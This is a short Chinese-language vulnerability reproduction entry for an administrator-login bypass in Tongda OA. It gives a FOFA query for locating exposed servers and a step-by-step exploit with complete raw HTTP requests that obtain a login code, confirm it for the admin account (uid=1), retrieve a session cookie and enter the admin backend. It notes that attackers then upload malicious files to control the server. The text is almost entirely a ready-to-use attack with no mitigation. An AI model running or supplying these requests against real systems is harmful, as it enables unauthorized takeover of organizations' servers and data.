T10-31通达-OA-PermissionAC

漏洞描述：

攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

网站图片:

网络测绘:

fofa语法：

app.name=“通达 OA”

漏洞复现:

获取code_uid

/ispirit/login_code.php

验证codeuid

/general/login_code_scan.php
post请求：codeuid={8E41DD10-C3C3-A664-2249-2A2B2DF23619}&source=pc&uid=1&type=confirm&username=admin
用上一步获取的codeuid进行替换，当响应status为1时，代表验证成功。

POST /general/login_code_scan.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

codeuid={8E41DD10-C3C3-A664-2249-2A2B2DF23619}&source=pc&uid=1&type=confirm&username=admin

获取cookie

/ispirit/login_code_check.php?codeuid={EED2B9FE-F865-DCF1-0E8D-3326AE163F6D}
使用上一步验证过的codeui进行替换，获取cookie

利用获取到的cookie登录系统
利用上一步获取的cookie替换，登录应用系统

GET /general/index.php?is_modify_pwd=1 HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2l86fav5r9d65gjcub1abh49n1;
Connection: close